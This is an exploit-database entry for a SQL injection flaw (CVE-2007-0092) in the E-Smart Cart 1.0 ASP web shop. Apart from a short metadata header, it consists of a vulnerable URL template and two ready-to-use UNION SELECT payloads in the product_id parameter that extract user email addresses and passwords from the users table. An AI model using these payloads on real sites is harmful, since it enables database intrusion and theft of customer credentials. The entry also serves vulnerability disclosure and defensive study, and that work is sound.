E-Smart Cart 1.0 - 'Product_ID' SQL Injection
Author: ajann
type: webapps
platform: asp
port:
date_added: 2007-01-02
date_updated: 2016-12-06
verified: 1
codes: OSVDB-31679;CVE-2007-0092
tags:
aliases:
screenshot_url:
application_url:
*******************************************************************************
# Title : E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : ...
# $$ : $49.00
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=[SQL]
Example:
//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-03]